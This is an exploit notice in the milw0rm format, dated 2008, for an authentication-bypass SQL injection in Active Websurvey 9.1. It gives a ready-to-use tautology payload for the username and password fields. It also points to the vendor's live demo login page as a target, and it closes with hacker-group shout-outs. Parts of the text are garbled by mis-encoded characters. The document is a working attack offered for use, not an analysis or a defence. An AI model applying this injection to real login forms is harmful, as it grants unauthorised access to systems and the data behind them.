Active Websurvey 9.1 - Authentication Bypass

[~] ----------------------------�0�1�0�0�0�0¨�0�1�0�0�0�0�0�6�0�1�6�4�0�9�銇0�7 �0�1�0�0�0�0§�0�1�6�4�0�9�銇0�6�0�1�6�4�0�9�銇0�6�0�1�6�4�0�9�銇0�3 �0�1�0�0�0�0§�0�1�6�4�0�9�銇0�6�0�1�0�0�0�0±�0�1�0�0�0�0�0�2�0�1�6�4�0�9�銇0�7�0�1�6�4�0�9��  �0�1�0�0�0�0§�0�1�6�4�0�9�銇0�6�0�1�0�0�0�0±�0�1�0�0�0�0�0�2�0�1�6�4�0�3 �0�1�6�4�0�9�銇0�7------------------------------
�0�1�6�5 [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
�0�1�6�5  �0�1�6�5
�0�1�6�5 [~]Vendor: www.activewebsoftwares.com
�0�1�6�5  �0�1�6�5
�0�1�6�5 [~]Software: Active Websurvey v 9.1
�0�1�6�5  �0�1�6�5
�0�1�6�5 [~]author: ((�0�1‘�0�0�0�53d D3v!L))
�0�1�6�5  �0�1�6�5
�0�1�6�5 [~] Date: 28.11.2008
�0�1�6�5  �0�1�6�5
�0�1�6�5 [~] Home: www.ahacker.biz
�0�1�6�5  �0�1�6�5
�0�1�6�5 [~] contact: N/A

[~] -----------------------------{str0ke}------------------------------
�0�1�6�5  �0�1�6�5
�0�1�6�5  �0�1�6�5
�0�1�6�5 [~] Exploit:
�0�1�6�5  �0�1�6�5
�0�1�6�5  username: r0' or ' 1=1--
�0�1�6�5  password: r0' or ' 1=1--
�0�1�6�5  �0�1�6�5
�0�1�6�5  �0�1�6�5
�0�1�6�5 [~]login 4 d3m0:
�0�1�6�5  �0�1�6�5
�0�1�6�5  http://www.activewebsoftwares.com/demoactivewebsurvey/SurveyTaker.asp
�0�1�6�5
�0�1�6�5 [~]-----------------------------{str0ke}---------------------------------------------------
�0�1�6�5
�0�1�6�5  [~] Greetz tO: {str0ke} & maxmos & EV!L KS@ & hesham_hacker
�0�1�6�5  [~]
�0�1�6�5  [~] spechial thanks : dolly & 7am3m & �0�1�0�0�0�0�0�1�0�1�6�4�0�9�銇0�7�0�1�0�0�0�0§�0�1�0�0�0�0�0�4 ,�0�1�0�0�0�0§�0�1�6�4�0�9�銇0�6�0�1�0�0�0�0�0�5�0�1�6�4�0�9�銇0�3�0�1�6�4�0�3 �0�1�0�0�0�0±�0�1�6�4�0�3
�0�1�6�5  [~]
�0�1�6�5  [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
�0�1�6�5  [~]
�0�1�6�5  [~] xp10.biz & ahacker.biz
�0�1�6�5  [~]
�0�1�6�5
�0�1�6�5 [~]--------------------------------------------------------------------------------

# milw0rm.com [2008-11-29]